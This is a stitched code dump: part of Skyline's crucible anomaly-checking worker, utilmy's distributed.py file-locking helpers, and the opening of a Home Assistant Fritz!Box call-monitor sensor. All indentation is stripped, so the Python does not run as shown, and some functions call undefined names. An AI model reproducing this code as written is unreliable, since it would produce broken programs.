cache_key = 'crucible.last_check.%s.%s' % (source_app, metric)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('cache_key - crucible.last_check.%s.%s' % (source_app, metric))
# Only use the cache_key EXPIRATION_TIME if this is not a request to
# run_crucible_tests on a timeseries
if run_crucible_tests == 'False':
if check_expired:
logger.info('check_expired - not checking Redis key')
last_check = True
else:
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('Checking if cache_key exists')
try:
last_check = self.redis_conn.get(cache_key)
except Exception as e:
logger.error('error :: could not query cache_key for %s - %s - %s' % (source_app, metric, e))
logger.info('all anomaly files will be removed')
remove_all_anomaly_files = True
if not last_check:
try:
self.redis_conn.setex(cache_key, expiration_timeout, packb(value))
logger.info('set cache_key for %s - %s with timeout of %s' % (source_app, metric, str(expiration_timeout)))
except Exception as e:
logger.error('error :: could not query cache_key for %s - %s - %s' % (source_app, metric, e))
logger.info('all anomaly files will be removed')
remove_all_anomaly_files = True
else:
if check_expired:
logger.info('check_expired - all anomaly files will be removed')
remove_all_anomaly_files = True
else:
logger.info('cache_key is set and not expired for %s - %s - all anomaly files will be removed' % (source_app, metric))
remove_all_anomaly_files = True
# anomaly dir
if not os.path.exists(str(anomaly_dir)):
try:
# mkdir_p(skyline_app, str(anomaly_dir))
mkdir_p(anomaly_dir)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('created anomaly dir - %s' % str(anomaly_dir))
except:
logger.error('error :: failed to create anomaly_dir - %s' % str(anomaly_dir))
if not os.path.exists(str(anomaly_dir)):
logger.error('error :: anomaly_dir does not exist')
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
else:
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('anomaly dir exists - %s' % str(anomaly_dir))
failed_check_file = anomaly_dir + '/' + metric_timestamp + '.failed.check.' + metric + '.txt'
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('failed_check_file - %s' % str(failed_check_file))
# Retrieve data from graphite is necessary
anomaly_graph = anomaly_dir + '/' + metric + '.png'
anomaly_json = anomaly_dir + '/' + metric + '.json'
anomaly_json_gz = anomaly_json + '.gz'
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('anomaly_graph - %s' % str(anomaly_graph))
logger.info('anomaly_json - %s' % str(anomaly_json))
logger.info('anomaly_json_gz - %s' % str(anomaly_json_gz))
# Some things added to crucible may not be added by a skyline app per se
# and if run_crucible_tests is string True then no anomaly files should
# be removed.
if run_crucible_tests == 'True':
remove_all_anomaly_files = False
# Remove check and anomaly files if the metric has a EXPIRATION_TIME
# cache_key set
if remove_all_anomaly_files:
if os.path.isfile(anomaly_graph):
try:
os.remove(anomaly_graph)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('anomaly_graph removed - %s' % str(anomaly_graph))
except OSError:
pass
if os.path.isfile(anomaly_json):
try:
os.remove(anomaly_json)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('anomaly_json removed - %s' % str(anomaly_json))
except OSError:
pass
if os.path.isfile(anomaly_json_gz):
try:
os.remove(anomaly_json_gz)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('anomaly_json_gz removed - %s' % str(anomaly_json_gz))
except OSError:
pass
anomaly_txt_file = anomaly_dir + '/' + metric + '.txt'
if os.path.isfile(anomaly_txt_file):
try:
os.remove(anomaly_txt_file)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('anomaly_txt_file removed - %s' % str(anomaly_txt_file))
except OSError:
pass
# TBD - this data would have to be added to the panaorama DB before
# it is removed
if os.path.isfile(str(metric_check_file)):
try:
os.remove(str(metric_check_file))
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('metric_check_file removed - %s' % str(metric_check_file))
except OSError:
pass
if os.path.exists(str(anomaly_dir)):
try:
os.rmdir(str(anomaly_dir))
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('anomaly_dir removed - %s' % str(anomaly_dir))
except OSError:
pass
logger.info('check and anomaly files removed')
return
# Check if the image exists
if graphite_metric == 'True':
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('graphite_metric - %s' % (graphite_metric))
# Graphite timeouts
connect_timeout = int(settings.GRAPHITE_CONNECT_TIMEOUT)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('connect_timeout - %s' % str(connect_timeout))
read_timeout = int(settings.GRAPHITE_READ_TIMEOUT)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('read_timeout - %s' % str(read_timeout))
graphite_until = datetime.datetime.fromtimestamp(int(metric_timestamp)).strftime('%H:%M_%Y%m%d')
graphite_from = datetime.datetime.fromtimestamp(int(from_timestamp)).strftime('%H:%M_%Y%m%d')
# graphite URL
if settings.GRAPHITE_PORT != '':
url = settings.GRAPHITE_PROTOCOL + '://' + settings.GRAPHITE_HOST + ':' + settings.GRAPHITE_PORT + '/render/?from=' + graphite_from + '&until=' + graphite_until + '&target=' + metric + '&format=json'
else:
url = settings.GRAPHITE_PROTOCOL + '://' + settings.GRAPHITE_HOST + '/render/?from=' + graphite_from + '&until=' + graphite_until + '&target=' + metric + '&format=json'
# @added 20190612 - Feature #3108: crucible - graphite_override_uri_parameters
# This metric variable is used to to declare absolute graphite uri
# parameters
#from=00%3A00_20190527&until=23%3A59_20190612&target=movingMedian(nonNegativeDerivative(stats.zpf-watcher-prod-1-30g-doa2.vda.readTime)%2C24)
if graphite_override_uri_parameters:
if settings.GRAPHITE_PORT != '':
url = settings.GRAPHITE_PROTOCOL + '://' + settings.GRAPHITE_HOST + ':' + settings.GRAPHITE_PORT + '/render/?' + graphite_override_uri_parameters + '&format=json'
else:
url = settings.GRAPHITE_PROTOCOL + '://' + settings.GRAPHITE_HOST + '/render/?' + graphite_override_uri_parameters + '&format=json'
logger.info('graphite url set from graphite_override_uri_parameters - %s' % (url))
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('graphite url - %s' % (url))
if not os.path.isfile(anomaly_graph):
logger.info('retrieving png - surfacing %s graph from graphite from %s to %s' % (metric, graphite_from, graphite_until))
image_url = url.replace('&format=json', '')
graphite_image_file = anomaly_dir + '/' + metric + '.png'
if 'width' not in image_url:
image_url += '&width=586'
if 'height' not in image_url:
image_url += '&height=308'
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('graphite image url - %s' % (image_url))
image_url_timeout = int(connect_timeout)
image_data = None
try:
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
image_data = urllib2.urlopen(image_url, timeout=image_url_timeout).read() # nosec
logger.info('url OK - %s' % (image_url))
except urllib2.URLError:
image_data = None
logger.error('error :: url bad - %s' % (image_url))
if image_data is not None:
with open(graphite_image_file, 'w') as f:
f.write(image_data)
logger.info('retrieved - %s' % (anomaly_graph))
if python_version == 2:
os.chmod(graphite_image_file, 0644)
if python_version == 3:
os.chmod(graphite_image_file, mode=0o644)
else:
logger.error('error :: failed to retrieved - %s' % (anomaly_graph))
else:
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('anomaly_graph file exists - %s' % str(anomaly_graph))
if not os.path.isfile(anomaly_graph):
logger.error('error :: retrieve failed to surface %s graph from graphite' % (metric))
else:
logger.info('graph image exists - %s' % (anomaly_graph))
# Check if the json exists
if not os.path.isfile(anomaly_json_gz):
if not os.path.isfile(anomaly_json):
logger.info('surfacing timeseries data for %s from graphite from %s to %s' % (metric, graphite_from, graphite_until))
if requests.__version__ >= '2.4.0':
use_timeout = (int(connect_timeout), int(read_timeout))
else:
use_timeout = int(connect_timeout)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('use_timeout - %s' % (str(use_timeout)))
try:
r = requests.get(url, timeout=use_timeout)
js = r.json()
datapoints = js[0]['datapoints']
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('data retrieved OK')
except:
datapoints = [[None, int(graphite_until)]]
logger.error('error :: data retrieval failed')
converted = []
for datapoint in datapoints:
try:
new_datapoint = [float(datapoint[1]), float(datapoint[0])]
converted.append(new_datapoint)
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
except: # nosec
continue
with open(anomaly_json, 'w') as f:
f.write(json.dumps(converted))
if python_version == 2:
os.chmod(anomaly_json, 0644)
if python_version == 3:
os.chmod(anomaly_json, mode=0o644)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('json file - %s' % anomaly_json)
if not os.path.isfile(anomaly_json):
logger.error('error :: failed to surface %s json from graphite' % (metric))
# Move metric check file
try:
shutil.move(metric_check_file, failed_check_file)
logger.info('moved check file to - %s' % failed_check_file)
except OSError:
logger.error('error :: failed to move check file to - %s' % failed_check_file)
pass
return
# Check timeseries json exists - raw or gz
if not os.path.isfile(anomaly_json):
if not os.path.isfile(anomaly_json_gz):
logger.error('error :: no json data found')
# Move metric check file
try:
shutil.move(metric_check_file, failed_check_file)
logger.info('moved check file to - %s' % failed_check_file)
except OSError:
logger.error('error :: failed to move check file to - %s' % failed_check_file)
pass
return
else:
logger.info('timeseries json gzip exists - %s' % (anomaly_json_gz))
else:
logger.info('timeseries json exists - %s' % (anomaly_json))
# If timeseries json and run_crucible_tests is str(False) gzip and
# return here as there is nothing further to do
if run_crucible_tests == 'False':
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('run_crucible_tests - %s' % run_crucible_tests)
# gzip the json timeseries data
if os.path.isfile(anomaly_json):
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('gzipping - %s' % anomaly_json)
try:
f_in = open(anomaly_json)
f_out = gzip.open(anomaly_json_gz, 'wb')
f_out.writelines(f_in)
f_out.close()
f_in.close()
os.remove(anomaly_json)
if python_version == 2:
os.chmod(anomaly_json_gz, 0644)
if python_version == 3:
os.chmod(anomaly_json_gz, mode=0o644)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('gzipped - %s' % anomaly_json_gz)
try:
os.remove(metric_check_file)
logger.info('removed check file - %s' % metric_check_file)
except OSError:
pass
return
except:
logger.error('error :: Failed to gzip data file - %s' % str(traceback.print_exc()))
try:
os.remove(metric_check_file)
logger.info('removed check file - %s' % metric_check_file)
except OSError:
pass
return
if os.path.isfile(anomaly_json_gz):
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('gzip exists - %s' % anomaly_json)
try:
os.remove(metric_check_file)
logger.info('removed check file - %s' % metric_check_file)
except OSError:
pass
return
nothing_to_do = 'true - for debug only'
# self.check_if_parent_is_alive()
# Run crucible algorithms
logger.info('running crucible tests - %s' % (metric))
if os.path.isfile(anomaly_json_gz):
if not os.path.isfile(anomaly_json):
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('ungzipping - %s' % anomaly_json_gz)
try:
# with gzip.open(anomaly_json_gz, 'rb') as fr:
fr = gzip.open(anomaly_json_gz, 'rb')
raw_timeseries = fr.read()
fr.close()
except Exception as e:
logger.error('error :: could not ungzip %s - %s' % (anomaly_json_gz, e))
traceback.print_exc()
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('ungzipped')
logger.info('writing to - %s' % anomaly_json)
with open(anomaly_json, 'w') as fw:
fw.write(raw_timeseries)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('anomaly_json done')
if python_version == 2:
os.chmod(anomaly_json, 0644)
if python_version == 3:
os.chmod(anomaly_json, mode=0o644)
else:
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('No gzip - %s' % anomaly_json_gz)
nothing_to_do = 'true - for debug only'
if os.path.isfile(anomaly_json):
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('anomaly_json exists - %s' % anomaly_json)
if os.path.isfile(anomaly_json):
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('loading timeseries from - %s' % anomaly_json)
timeseries = None
try:
with open(anomaly_json, 'r') as f:
timeseries = json.loads(f.read())
raw_timeseries = f.read()
timeseries_array_str = str(raw_timeseries).replace('(', '[').replace(')', ']')
timeseries = literal_eval(timeseries_array_str)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('loaded time series from - %s' % anomaly_json)
except:
# logger.error(traceback.format_exc())
logger.info('failed to load with JSON, literal_eval will be tried - %s' % anomaly_json)
# @added 20180715 - Task #2444: Evaluate CAD
# Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
# If the json.loads fails use literal_eval
if not timeseries:
try:
with open(anomaly_json, 'r') as f:
raw_timeseries = f.read()
timeseries_array_str = str(raw_timeseries).replace('(', '[').replace(')', ']')
timeseries = literal_eval(timeseries_array_str)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('loaded time series with literal_eval from - %s' % anomaly_json)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to load JSON - %s' % anomaly_json)
else:
try:
logger.error('error :: file not found - %s' % anomaly_json)
shutil.move(metric_check_file, failed_check_file)
if python_version == 2:
os.chmod(failed_check_file, 0644)
if python_version == 3:
os.chmod(failed_check_file, mode=0o644)
logger.info('moved check file to - %s' % failed_check_file)
except OSError:
logger.error('error :: failed to move check file to - %s' % failed_check_file)
pass
return
start_timestamp = int(timeseries[0][0])
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('start_timestamp - %s' % str(start_timestamp))
end_timestamp = int(timeseries[-1][0])
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('end_timestamp - %s' % str(end_timestamp))
full_duration = end_timestamp - start_timestamp
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('full_duration - %s' % str(full_duration))
self.check_if_parent_is_alive()
run_algorithms_start_timestamp = int(time())
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('run_algorithms_start_timestamp - %s' % str(run_algorithms_start_timestamp))
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('run_algorithms - %s,%s,%s,%s,%s,%s' % (metric, str(end_timestamp), str(full_duration), anomaly_json, skyline_app, str(algorithms)))
try:
anomalous, ensemble = run_algorithms(timeseries, str(metric), end_timestamp, full_duration, str(anomaly_json), skyline_app, algorithms)
except:
logger.error('error :: run_algorithms failed - %s' % str(traceback.print_exc()))
run_algorithms_end_timestamp = int(time())
run_algorithms_seconds = run_algorithms_end_timestamp - run_algorithms_start_timestamp
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('anomalous, ensemble - %s, %s' % (anomalous, str(ensemble)))
if anomalous:
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('anomalous - %s' % (anomalous))
nothing_to_do = 'true - for debug only'
logger.info('run_algorithms took %s seconds' % str(run_algorithms_seconds))
# Update anomaly file
crucible_data = 'crucible_tests_run = "%s"\n' \
'crucible_triggered_algorithms = %s\n' \
'tested_by = "%s"\n' \
% (str(run_timestamp), str(ensemble), str(this_host))
crucible_anomaly_file = '%s/%s.txt' % (anomaly_dir, metric)
with open(crucible_anomaly_file, 'a') as fh:
fh.write(crucible_data)
if python_version == 2:
os.chmod(crucible_anomaly_file, 0644)
if python_version == 3:
os.chmod(crucible_anomaly_file, mode=0o644)
logger.info('updated crucible anomaly file - %s/%s.txt' % (anomaly_dir, metric))
# gzip the json timeseries data after analysis
if os.path.isfile(anomaly_json):
if not os.path.isfile(anomaly_json_gz):
try:
f_in = open(anomaly_json)
f_out = gzip.open(anomaly_json_gz, 'wb')
f_out.writelines(f_in)
f_out.close()
f_in.close()
os.remove(anomaly_json)
if python_version == 2:
os.chmod(anomaly_json_gz, 0644)
if python_version == 3:
os.chmod(anomaly_json_gz, mode=0o644)
logger.info('gzipped - %s' % (anomaly_json_gz))
except:
logger.error('error :: Failed to gzip data file - %s' % str(traceback.print_exc()))
else:
os.remove(anomaly_json)
if run_script:
if os.path.isfile(run_script):
logger.info('running - %s' % (run_script))
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
os.system('%s %s' % (str(run_script), str(crucible_anomaly_file))) # nosec
# Remove metric check file
nothing_to_do = ''
try:
os.remove(metric_check_file)
logger.info('complete removed check file - %s %s' % (metric_check_file, nothing_to_do))
except OSError:
pass
def run(self):
"""
Called when the process intializes.
"""
# Log management to prevent overwriting
# Allow the bin/<skyline_app>.d to manage the log
if os.path.isfile(skyline_app_logwait):
try:
os.remove(skyline_app_logwait)
except OSError:
logger.error('error - failed to remove %s, continuing' % skyline_app_logwait)
pass
now = time()
log_wait_for = now + 5
while now < log_wait_for:
if os.path.isfile(skyline_app_loglock):
sleep(.1)
now = time()
else:
now = log_wait_for + 1
logger.info('starting %s run' % skyline_app)
if os.path.isfile(skyline_app_loglock):
logger.error('error - bin/%s.d log management seems to have failed, continuing' % skyline_app)
try:
os.remove(skyline_app_loglock)
logger.info('log lock file removed')
except OSError:
logger.error('error - failed to remove %s, continuing' % skyline_app_loglock)
pass
else:
logger.info('bin/%s.d log management done' % skyline_app)
logger.info('process intialized')
while 1:
now = time()
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('process started - %s' % int(now))
# Make sure check_dir exists and has not been removed
try:
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('checking check dir exists - %s' % settings.CRUCIBLE_CHECK_PATH)
os.path.exists(settings.CRUCIBLE_CHECK_PATH)
except:
logger.error('error :: check dir did not exist - %s' % settings.CRUCIBLE_CHECK_PATH)
mkdir_p(settings.CRUCIBLE_CHECK_PATH)
logger.info('check dir created - %s' % settings.CRUCIBLE_CHECK_PATH)
os.path.exists(settings.CRUCIBLE_CHECK_PATH)
# continue
# Make sure Redis is up
try:
self.redis_conn.ping()
logger.info('connected to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
except:
logger.info('skyline can not connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
sleep(10)
logger.info('connecting to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
# @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow
if settings.REDIS_PASSWORD:
self.redis_conn = StrictRedis(password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH)
else:
self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
continue
"""
Determine if any metric has been added to test
"""
while True:
# Report app up
self.redis_conn.setex(skyline_app, 120, now)
metric_var_files = [f for f in listdir(settings.CRUCIBLE_CHECK_PATH) if isfile(join(settings.CRUCIBLE_CHECK_PATH, f))]
# if len(metric_var_files) == 0:
if not metric_var_files:
logger.info('sleeping 10 no metric check files')
sleep(10)
# Discover metric to analyze
metric_var_files = ''
metric_var_files = [f for f in listdir(settings.CRUCIBLE_CHECK_PATH) if isfile(join(settings.CRUCIBLE_CHECK_PATH, f))]
# if len(metric_var_files) > 0:
if metric_var_files:
break
metric_var_files_sorted = sorted(metric_var_files)
metric_check_file = settings.CRUCIBLE_CHECK_PATH + "/" + str(metric_var_files_sorted[0])
logger.info('assigning check for processing - %s' % str(metric_var_files_sorted[0]))
# Reset process_list
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# try:
# self.process_list[:] = []
# except:
# logger.error('error :: failed to reset self.process_list')
# Spawn processes
pids = []
spawned_pids = []
pid_count = 0
run_timestamp = int(now)
for i in range(1, settings.CRUCIBLE_PROCESSES + 1):
p = Process(target=self.spin_process, args=(i, run_timestamp, str(metric_check_file)))
pids.append(p)
pid_count += 1
logger.info('starting %s of %s spin_process/es' % (str(pid_count), str(settings.CRUCIBLE_PROCESSES)))
p.start()
spawned_pids.append(p.pid)
# Send wait signal to zombie processes
# for p in pids:
# p.join()
# Self monitor processes and terminate if any spin_process has run
# for longer than CRUCIBLE_TESTS_TIMEOUT
p_starts = time()
while time() - p_starts <= settings.CRUCIBLE_TESTS_TIMEOUT:
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info('%s :: %s spin_process/es completed in %.2f seconds' % (skyline_app, str(settings.CRUCIBLE_PROCESSES), time_to_run))
break
else:
# We only enter this if we didn't 'break' above.
logger.info('%s :: timed out, killing all spin_process processes' % (skyline_app))
for p in pids:
p.terminate()
# p.join()
for p in pids:
if p.is_alive():
logger.info('%s :: stopping spin_process - %s' % (skyline_app, str(p.is_alive())))
p.join()
while os.path.isfile(metric_check_file):
sleep(1)
|
distributed.py
|
HELP="""All related to distributed compute and atomic read/write
Thread Safe
Process Safe
Lock Mechanism
"""
import os, sys, socket, platform, time, gc,logging, random
###############################################################################################
from utilmy.utilmy import log, log2
def help():
from utilmy import help_create
ss = help_create("utilmy.distributed", prefixs= [ 'test']) #### Merge test code
ss += HELP
print(ss)
def log_mem(*s):
try:
# print(*s, "\n", flush=True)
import psutil
log2('mem check', str(psutil.virtual_memory()))
# print(s)
except:
pass
################################################################################################
# Test functions
def test_functions():
"""Check that list function is working.
os_lock_releaseLock, os_lock_releaseLock, os_lock_execute
Basic test on only 1 thread
"""
# test function
def running(fun_args):
print(f'Function running with arg: {fun_args}')
# test that os_lock_execute is working
os_lock_execute(running, 'Test_args', plock='tmp/plock.lock')
os_lock_execute(running, [1, 2, 3], plock='tmp/plock.lock')
def test_funtions_thread():
"""Check that list function is working.
os_lock_releaseLock, os_lock_releaseLock, os_lock_execute
Multi threads
How the test work.
- Create and run 5 threads. These threads try to access and use 1 function `running`
with os_lock_execute. So in one 1, only 1 thread can access and use this function.
"""
import threading
# define test function
def running(fun_args):
print(f'Function running in thread: {fun_args} START')
time.sleep(fun_args* 0.2)
print(f'Function running in thread: {fun_args} END')
# define test thread
def thread_running(number):
print(f'Thread {number} START')
os_lock_execute(running, number, plock='tmp/plock2.lock')
print(f'Thread {number} sleeping in {number*3}s')
time.sleep(number* 0.5)
print(f'Thread {number} END')
# Create thread
for i in range(3):
t = threading.Thread(target=thread_running, args=(i+1, ))
t.start()
def test_index():
"""Check that class IndexLock is working
Multi threads
How the test work.
- The test will create the INDEX with the file using plock
- Create 100 threads that try to write data to this INDEX file lock
- This test will make sure with this INDEX file log
only 1 thread can access and put data to this file.
Others will waiting to acquire key after thread release it.
"""
import threading
file_name = "./test.txt"
#file_lock = "tmp/plock3.lock"
INDEX = IndexLock(file_name, file_lock=None)
#1. Create test file
#with open(file_name, mode='w+') as fp:
# pass
# define test thread
def thread_running(number):
print(f'Thread {number} START')
INDEX.put(f'Thread {number}')
INDEX.save_filter(f'Thread {number}')
print( INDEX.get() )
print(f'Thread {number} END')
# Create thread
for i in range(3):
t = threading.Thread(target=thread_running, args=(i+1, ))
t.start()
def test_tofilesafe():
pass
def test_all():
test_functions()
test_funtions_thread()
test_index()
#########################################################################################################
####### Atomic File writing ##############################################################################
class toFile(object):
def __init__(self,fpath):
"""
Thread Safe file writer
"""
logger = logging.getLogger('log')
logger.setLevel(logging.INFO)
ch = logging.FileHandler(fpath)
ch.setFormatter(logging.Formatter('%(message)s'))
logger.addHandler(ch)
self.logger = logger
def write(self, msg):
self.logger.info( msg)
def to_file_safe(msg:str, fpath:str):
ss = str(msg)
logger = logging.getLogger('log')
logger.setLevel(logging.INFO)
ch = logging.FileHandler(fpath)
ch.setFormatter(logging.Formatter('%(message)s'))
logger.addHandler(ch)
logger.info( ss)
#########################################################################################################
####### Atomic File Index read/writing #################################################################
class IndexLock(object):
"""Keep a Global Index of processed files.
INDEX = IndexLock(findex)
flist = index.save_isok(flist) ## Filter out files in index and return available files
### only process correct files
"""
### Manage Invemtory Index with Atomic Write/Read
def __init__(self, findex, file_lock=None, min_size=5, skip_comment=True, ntry=20):
self.findex= findex
os.makedirs(os.path.dirname( os.path.abspath(self.findex)), exist_ok=True)
if file_lock is None:
file_lock = os.path.dirname(findex) +"/"+ findex.split("/")[-1].replace(".", "_lock.")
self.plock = file_lock
### Initiate the file
if not os.path.isfile(self.findex):
with open(self.findex, mode='a') as fp:
fp.write("")
self.min_size=min_size
self.skip_comment=True
self.ntry =ntry
def read(self,): ### alias
return self.get()
def save_isok(self, flist:list): ### Alias
return put(self, val)
def save_filter(self, val:list=None):
return put(self, val)
######################################################################
def get(self, **kw):
## return the list of files
with open(self.findex, mode='r') as fp:
flist = fp.readlines()
if len(flist) < 1 : return []
flist2 = []
for t in flist :
if len(t) < self.min_size: continue
if self.skip_comment and t[0] == "#" : continue
flist2.append( t.strip() )
return flist2
def put(self, val:list=None):
""" Read, check if the insert values are there, and save the files
flist = index.check_filter(flist) ### Remove already processed files
if len(flist) < 1 : continue ### Dont process flist
### Need locking mechanism Common File to check for Check + Write locking.
"""
import random, time
if val is None : return True
if isinstance(val, str):
val = [val]
i = 1
while i < self.ntry :
try :
lock_fd = os_lock_acquireLock(self.plock)
### Check if files exist #####################
fall = self.read()
val2 = [] ; isok= True
for fi in val:
if fi in fall :
print('exist in Index, skipping', fi)
isok =False
else :
val2.append(fi)
if len(val2) < 1 : return []
#### Write the list of files on Index: Wont be able to use by other processes
ss = ""
for fi in val2 :
x = str(fi)
ss = ss + x.strip() + "\n"
with open(self.findex, mode='a') as fp:
fp.write( ss )
os_lock_releaseLock(lock_fd)
return val2
except Exception as e:
log2(f"file lock waiting {i}s")
time.sleep( random.random() * i )
i += 1
class Index0(object):
"""
### to maintain global index, flist = index.read() index.save(flist)
"""
def __init__(self, findex:str="ztmp_file.txt", ntry=10):
self.findex = findex
os.makedirs(os.path.dirname(self.findex), exist_ok=True)
if not os.path.isfile(self.findex):
with open(self.findex, mode='a') as fp:
fp.write("")
self.ntry= ntry
def read(self,):
import time
try :
with open(self.findex, mode='r') as fp:
flist = fp.readlines()
except:
time.sleep(5)
with open(self.findex, mode='r') as fp:
flist = fp.readlines()
if len(flist) < 1 : return []
flist2 = []
for t in flist :
if len(t) > 5 and t[0] != "#" :
flist2.append( t.strip() )
return flist2
def save(self, flist:list):
if len(flist) < 1 : return True
ss = ""
for fi in flist :
ss = ss + fi + "\n"
with open(self.findex, mode='a') as fp:
fp.write(ss )
return True
def save_filter(self, val:list=None):
"""
isok = index.save_isok(flist)
if not isok : continue ### Dont process flist
### Need locking mechanism Common File to check for Check + Write locking.
"""
import random, time
if val is None : return True
if isinstance(val, str):
val = [val]
i = 1
while i < self.ntry :
try :
### Check if files exist #####################
fall = self.read()
val2 = [] ; isok= True
for fi in val:
if fi in fall :
print('exist in Index, skipping', fi)
isok =False
else :
val2.append(fi)
if len(val2) < 1 : return []
#### Write the list of files on disk
ss = ""
for fi in val2 :
x = str(fi)
ss = ss + x + "\n"
with open(self.findex, mode='a') as fp:
fp.write( ss )
return val2
except Exception as e:
print(f"file lock waiting {i}s")
time.sleep( random.random() * i )
i += 1
#####################################################################################################
###### Atomic Execution ############################################################################
def os_lock_acquireLock(plock:str="tmp/plock.lock"):
''' acquire exclusive lock file access, return the locker
'''
import fcntl
os.makedirs(os.path.dirname(os.path.abspath(plock)), exist_ok=True)
locked_file_descriptor = open( plock, 'w+')
fcntl.flock(locked_file_descriptor, fcntl.LOCK_EX | fcntl.LOCK_NB)
return locked_file_descriptor
def os_lock_releaseLock(locked_file_descriptor):
''' release exclusive lock file access '''
import fcntl
fcntl.flock(locked_file_descriptor, fcntl.LOCK_UN)
# locked_file_descriptor.close()
def os_lock_execute(fun_run, fun_args=None, ntry=5, plock="tmp/plock.lock", sleep=5):
""" Run a function in an atomic way :
Write on disk exclusively on COMMON File.
"""
i = 0
while i < ntry :
try :
lock_fd = os_lock_acquireLock(plock)
fun_run(fun_args)
os_lock_releaseLock(lock_fd)
break
except Exception as e:
# log2(e)
# reduce sleep time
log2("file lock waiting", sleep, 'sec')
time.sleep(sleep)
i += 1
################################################################################################
def date_now(fmt = "%Y-%m-%d %H:%M:%S %Z%z"):
from pytz import timezone
from datetime import datetime
# Current time in UTC
now_utc = datetime.now(timezone('UTC'))
# Convert to US/Pacific time zone
now_pacific = now_utc.astimezone(timezone('Asia/Tokyo'))
return now_pacific.strftime(fmt)
def time_sleep_random(nmax=5):
import random, time
time.sleep( random.randrange(nmax) )
def save(dd, to_file="", verbose=False):
import pickle, os
os.makedirs(os.path.dirname(to_file), exist_ok=True)
pickle.dump(dd, open(to_file, mode="wb") , protocol=pickle.HIGHEST_PROTOCOL)
#if verbose : os_file_check(to_file)
def load(to_file=""):
import pickle
dd = pickle.load(open(to_file, mode="rb"))
return dd
def load_serialize(name):
global pcache
#import diskcache as dc
log2("loading ", pcache)
cache = load(pcache)
return cache
# return {'a' : {'b': 2}}
def save_serialize(name, value):
global pcache
#import diskcache as dc
log2("inserting ", pcache)
save(value, pcache)
if __name__ == '__main__':
import fire
fire.Fire()
|
fritzbox_callmonitor.py
|
"""
A sensor to monitor incoming and outgoing phone calls on a Fritz!Box router.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.fritzbox_callmonitor/
"""
import logging
import socket
import threading
import datetime
import time
import re
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (CONF_HOST, CONF_PORT, CONF_NAME,
CONF_PASSWORD, CONF_USERNAME,
EVENT_HOMEASSISTANT_STOP)
from homeassistant.helpers.entity import Entity
import homeassistant.helpers.config_validation as cv
from homeassistant.util import Throttle
REQUIREMENTS = ['fritzconnection==0.6.5']
_LOGGER = logging.getLogger(__name__)
CONF_PHONEBOOK = 'phonebook'
CONF_PREFIXES = 'prefixes'
DEFAULT_HOST = '169.254.1.1' # IP valid for all Fritz!Box routers
DEFAULT_NAME = 'Phone'
DEFAULT_PORT = 1012
INTERVAL_RECONNECT = 60
VALUE_CALL = 'dialing'
VALUE_CONNECT = 'talking'
VALUE_DEFAULT = 'idle'
VALUE_DISCONNECT = 'idle'
VALUE_RING = 'ringing'
# Return cached results if phonebook was downloaded less then this time ago.
MIN_TIME_PHONEBOOK_UPDATE = datetime.timedelta(hours=6)
SCAN_INTERVAL = datetime.timedelta(hours=3)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
